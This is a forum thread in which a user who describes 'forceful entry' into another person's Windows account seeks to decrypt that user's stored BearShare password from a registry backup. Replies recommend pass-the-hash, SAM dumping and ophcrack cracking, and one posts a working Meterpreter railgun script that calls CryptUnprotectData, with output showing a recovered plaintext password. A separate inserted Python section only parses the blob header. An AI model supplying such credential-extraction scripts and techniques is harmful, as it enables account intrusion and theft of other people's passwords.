Mycael Posted February 27, 2013

Greetings! I'm having a problem with a hex-coded password from a registry file. It's related to Bearshare. I fed it into a hex-to-ASCII converter, and this string pops out:

Ð Ñ O eMž í» EncryptedString ü ©c \ °·Ûv â Ë ¥ ³ M3æ ¥Ç" ïr©ÜVâ5à $l Ž

Lol, any help would be greatly appreciated. Thanks!

Registry contents below:

```
"Password"=hex:01,00,00,00,d0,8c,9d,df,01,15,d1,11,8c,7a,00,c0,4f,c2,97,eb,01,\
00,00,00,90,ae,9f,9f,65,be,4d,48,9e,ae,18,17,ed,13,bb,75,00,00,00,00,20,00,\
00,00,45,00,6e,00,63,00,72,00,79,00,70,00,74,00,65,00,64,00,53,00,74,00,72,\
00,69,00,6e,00,67,00,00,00,10,66,00,00,00,01,00,00,20,00,00,00,fc,91,a9,72,\
63,dc,5c,a3,b0,09,b7,e9,db,6c,76,e7,00,00,00,00,04,80,00,00,a0,00,00,00,10,\
00,00,00,e2,09,cb,36,0d,35,a5,d8,b3,a8,4d,70,33,50,e6,5d,10,00,00,00,09,11,\
a5,f6,c7,52,22,29,ef,9b,72,55,a9,84,dc,17,14,00,00,00,01,6f,56,7c,e2,65,35,\
04,e0,5a,81,24,24,77,6c,d1,8e,bd,05,40
"AutoConnect"=dword:00000001
"RememberPassword"=dword:00000001
"Default"=dword:00000001
"Status"=dword:00000001
"Guest"=dword:00000000
"LoginUserType"=dword:00000000
"ActiveTabInSearch"=dword:00000000
"ActiveTabInWeb"=dword:00000000
"AdditionalResults"=dword:0000002d
```
digip Posted February 27, 2013 (edited)

It's not straight hex; it's like binary or encrypted data mixed in. I stripped some of the data out just so you can see the readable string part:

Ð ß Ñ z ÀOÂ ë ® e¾MH ® í »u E n c r y p t e d S t r i n g f ü ©rcÜ\£° ·éÛlvç â Ë6 5¥Ø³¨Mp3Pæ] ¥öÇR")ï rU© Ü oV|âe5 àZ $$wlÑ ½ @

You can use http://home.paulschou.net/tools/xlate/ to decode hex, but this has probably got more to it than just hex in it.

Edited February 27, 2013 by digip
bwall Posted February 28, 2013

Looks like it might be a DPAPI blob, which means that without the master key, the user's password and possible entropy, you can't decrypt it without being logged in as that user. http://msdn.microsoft.com/en-us/library/ms995355.aspx
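As an added illustration of bwall's identification (this is editor-supplied example code, not something posted in the thread), here is a small Python parser that takes the `"Password"=hex:` value exactly as it appears in the opening post, reassembles the `\`-continued lines into bytes, and checks the fixed-layout prefix of a DPAPI blob: the version, the well-known DPAPI provider GUID, the master key GUID, the flags, the UTF-16LE description (which is where the readable "EncryptedString" in the converter output comes from) and the cipher ALG_ID. The ALG_ID name table and the field offsets follow the published CryptProtectData blob layout; the function names and the `REG_VALUE_LINE` constant are this example's own.

```python
"""Identify a DPAPI (CryptProtectData) blob stored as a REG_BINARY .reg value."""
import re
import struct
import uuid

# Provider GUID present at offset 4 of every CryptProtectData blob.
DPAPI_PROVIDER_GUID = "df9d8cd0-1501-11d1-8c7a-00c04fc297eb"

# Subset of CryptoAPI ALG_ID values seen in DPAPI blobs.
ALG_NAMES = {
    0x6603: "CALG_3DES",
    0x660E: "CALG_AES_128",
    0x660F: "CALG_AES_192",
    0x6610: "CALG_AES_256",
    0x8004: "CALG_SHA1",
    0x800E: "CALG_SHA_512",
}

# Constructed sample input: the "Password" line from the opening post, verbatim,
# including the backslash line continuations used by .reg files.
REG_VALUE_LINE = r'''"Password"=hex:01,00,00,00,d0,8c,9d,df,01,15,d1,11,8c,7a,00,c0,4f,c2,97,eb,01,\
00,00,00,90,ae,9f,9f,65,be,4d,48,9e,ae,18,17,ed,13,bb,75,00,00,00,00,20,00,\
00,00,45,00,6e,00,63,00,72,00,79,00,70,00,74,00,65,00,64,00,53,00,74,00,72,\
00,69,00,6e,00,67,00,00,00,10,66,00,00,00,01,00,00,20,00,00,00,fc,91,a9,72,\
63,dc,5c,a3,b0,09,b7,e9,db,6c,76,e7,00,00,00,00,04,80,00,00,a0,00,00,00,10,\
00,00,00,e2,09,cb,36,0d,35,a5,d8,b3,a8,4d,70,33,50,e6,5d,10,00,00,00,09,11,\
a5,f6,c7,52,22,29,ef,9b,72,55,a9,84,dc,17,14,00,00,00,01,6f,56,7c,e2,65,35,\
04,e0,5a,81,24,24,77,6c,d1,8e,bd,05,40'''


def reg_hex_to_bytes(line: str) -> bytes:
    """Turn a '"Name"=hex:aa,bb,\\<newline>cc' .reg value into raw bytes."""
    _, sep, payload = line.partition("=hex:")
    if not sep:
        raise ValueError("not a REG_BINARY (hex:) value")
    payload = re.sub(r"\\\s*", "", payload)   # drop "\" line continuations
    payload = re.sub(r"\s+", "", payload)     # drop any remaining whitespace
    return bytes(int(h, 16) for h in payload.split(",") if h)


def parse_dpapi_blob_header(blob: bytes) -> dict:
    """Read the fixed prefix of a DPAPI blob; raise ValueError if it is not one.

    Layout (little-endian): DWORD version, GUID provider, DWORD master key
    version, GUID master key, DWORD flags, DWORD description length,
    description (UTF-16LE), ALG_ID cipher, DWORD cipher key length in bits.
    """
    if len(blob) < 56:
        raise ValueError("too short to be a DPAPI blob")
    off = 0
    (version,) = struct.unpack_from("<I", blob, off)
    off += 4
    provider = str(uuid.UUID(bytes_le=blob[off:off + 16]))
    off += 16
    if version != 1 or provider != DPAPI_PROVIDER_GUID:
        raise ValueError("version/provider GUID do not match a DPAPI blob")
    (mk_version,) = struct.unpack_from("<I", blob, off)
    off += 4
    master_key = str(uuid.UUID(bytes_le=blob[off:off + 16]))
    off += 16
    flags, desc_len = struct.unpack_from("<II", blob, off)
    off += 8
    if off + desc_len + 8 > len(blob):
        raise ValueError("description length runs past end of blob")
    description = blob[off:off + desc_len].decode("utf-16-le").rstrip("\x00")
    off += desc_len
    alg_crypt, alg_crypt_len = struct.unpack_from("<II", blob, off)
    return {
        "version": version,
        "provider_guid": provider,
        "master_key_version": mk_version,
        "master_key_guid": master_key,   # names the master key file needed to unprotect it
        "flags": flags,
        "description": description,
        "alg_crypt": alg_crypt,
        "alg_crypt_name": ALG_NAMES.get(alg_crypt, "unknown"),
        "alg_crypt_len": alg_crypt_len,
    }


def is_dpapi_blob(blob: bytes) -> bool:
    """True if the bytes carry a valid DPAPI header, False otherwise."""
    try:
        parse_dpapi_blob_header(blob)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    hdr = parse_dpapi_blob_header(reg_hex_to_bytes(REG_VALUE_LINE))
    for k, v in hdr.items():
        print(f"{k:20s} {v}")
```

Running it on the posted value reports the DPAPI provider GUID, the description "EncryptedString" and cipher CALG_AES_256, which is what makes this a DPAPI blob rather than a simple hex encoding: the data itself is only recoverable through CryptUnprotectData with that user's master key available, which is the situation bwall describes.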
Mycael Posted February 28, 2013 (Author)

Thing is, the account of said "user" had its password changed forcefully by an administrative account. This change invalidated all stored passwords, including this one. Before this happened, however, I managed to back up this registry, thinking it could be of use. This password being user-and-password dependent makes me wonder if there are other means to decipher the contents of this hex. I still have access to the user's PC and account (after forceful entry, of course). Wondering if it's possible to revert the user's account settings to the state before the forceful entry. Any ideas? Thanks for the earlier posts. Really appreciate them :)
digip Posted March 1, 2013

If you have the original key, and access to the user's session, under their sign-on, you can replace the reg key, then yes, it will put it back, but that depends on your level of access and lockdown of registry, group policy, etc. It's easier to log in to the user's session with the current password and just change it via Control Panel, but if it's a domain login, the password is a different setup, one for local login, one for domain, which is controlled by the domain controller, and the user's session is logging in remotely. Cached credentials can sometimes be pulled depending on if they left default group policy settings in effect; you can also bypass all of it with a pass-the-hash attack to just use the token shared between live sessions. If the password is what you want to decrypt though, grab the SAM database and use something like ophcrack to retrieve the password, but that probably only contains the local admin pass and not the domain pass. I'm not 100% sure how to get a domain password for a user, but I imagine it's probably a hashed key like you showed above that is decrypted during login with some function at the domain controller end. Been so long since I've even had to think about these processes since MCSE classes, I don't even remember how the storage works any more, and with Windows Server 2008 I know the data is backwards compatible but also has newer secure storage of data that may be different than, say, working on Win2000 and Win2003. Best guy to ask that would probably know is Mubix.
mubix Posted March 3, 2013 (edited)

Ya, it was a password stored in the user's store. Wrote a quick script to decrypt (mostly stolen from post/windows/gather/credentials/outlook.rb):

```ruby
# Meterpreter script: load crypt32 via railgun and call CryptUnprotectData
# from inside the logged-in user's session.
def prepare_railgun
  rg = session.railgun
  if (!rg.get_dll('crypt32'))
    rg.add_dll('crypt32')
  end
end

def decrypt_password(data)
  rg = session.railgun
  pid = client.sys.process.getpid
  process = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
  # Allocate room for the whole blob (the original hard-coded 128 bytes,
  # which is smaller than this blob; meterpreter rounds up to a page anyway).
  mem = process.memory.allocate(data.length)
  process.memory.write(mem, data)
  # Build a DATA_BLOB {DWORD cbData; BYTE* pbData} matching the process bitness.
  if session.sys.process.each_process.find { |i| i["pid"] == pid }["arch"] == "x86"
    addr = [mem].pack("V")
    len = [data.length].pack("V")
    ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 8)
    #print_status("#{ret.inspect}")
    len, addr = ret["pDataOut"].unpack("V2")
  else
    addr = [mem].pack("Q")
    len = [data.length].pack("Q")
    ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 16)
    len, addr = ret["pDataOut"].unpack("Q2")
  end
  return "" if len == 0
  # Read the plaintext back out of the DATA_BLOB the API filled in.
  decrypted_pw = process.memory.read(addr, len)
  return decrypted_pw
end

def get_valdata(k, name)
  @key_base = 'HKCU\\Software\\BearShare\\Users\\superuser@mailinator.com'
  registry_getvaldata("#{@key_base}\\#{k}", name)
end

prepare_railgun
data = get_valdata("", 'Password')
print_error data.inspect
password = decrypt_password(data)
print_status password.inspect
```

And got the following output when logged in as Administrator (who installed Bearshare) and with the password of 'password':

```
meterpreter > run decrypt_bearshare
[-] "\x01\x00\x00\x00\xD0\x8C\x9D\xDF\x01\x15\xD1\x11\x8Cz\x00\xC0O\xC2\x97\xEB\x01\x00\x00\x00\xEC\x01\xFB\x97\x80\xD7qF\x95\xA76b&\xC87U\x00\x00\x00\x00 \x00\x00\x00E\x00n\x00c\x00r\x00y\x00p\x00t\x00e\x00d\x00S\x00t\x00r\x00i\x00n\x00g\x00\x00\x00\x03f\x00\x00\xA8\x00\x00\x00\x10\x00\x00\x00\x10\x97\xE4\xA5m\xCD\x85PI\xC67\x1Da\xB4\xBB<\x00\x00\x00\x00\x04\x80\x00\x00\xA0\x00\x00\x00\x10\x00\x00\x00\x06\xC8\x01\x9C\xB7I\x10BL\x14{\x9D\xF5\xECp\a\x10\x00\x00\x00\xD8\xF4\vB\xE8(\xFB^\xF2\x9F\x10\xFC>cnG\x14\x00\x00\x00\xC5z\a\xD3?\xD7\xDEz0\x0E\xD8\x9E\xC11.d\x96\x95 \xC6"
[*] "password\x00"
```

I then exported the entire registry tree for Bearshare and moved it to a new user 'bob', importing it as it was from Administrator:

```
meterpreter > run decrypt_bearshare
[-] "\x01\x00\x00\x00\xD0\x8C\x9D\xDF\x01\x15\xD1\x11\x8Cz\x00\xC0O\xC2\x97\xEB\x01\x00\x00\x00\xEC\x01\xFB\x97\x80\xD7qF\x95\xA76b&\xC87U\x00\x00\x00\x00 \x00\x00\x00E\x00n\x00c\x00r\x00y\x00p\x00t\x00e\x00d\x00S\x00t\x00r\x00i\x00n\x00g\x00\x00\x00\x03f\x00\x00\xA8\x00\x00\x00\x10\x00\x00\x00\x10\x97\xE4\xA5m\xCD\x85PI\xC67\x1Da\xB4\xBB<\x00\x00\x00\x00\x04\x80\x00\x00\xA0\x00\x00\x00\x10\x00\x00\x00\x06\xC8\x01\x9C\xB7I\x10BL\x14{\x9D\xF5\xECp\a\x10\x00\x00\x00\xD8\xF4\vB\xE8(\xFB^\xF2\x9F\x10\xFC>cnG\x14\x00\x00\x00\xC5z\a\xD3?\xD7\xDEz0\x0E\xD8\x9E\xC11.d\x96\x95 \xC6"
[*] ""
```

No joy (as expected).

Edited March 3, 2013 by mubix
mubix Posted March 3, 2013

If you still have the ability to log in as that user, forced password change or not, I think you should still be able to decrypt the password. I forced a password change from one administrator account to the other and, once logged in (as the user with Bearshare installed), was still able to decrypt the Bearshare password.
Mycael Posted March 4, 2013 (Author)

Speechless. @Mubix and digip, you guys are awesome! Will give this a shot; I'll update as soon as I get results. Thanks for the effort and support :)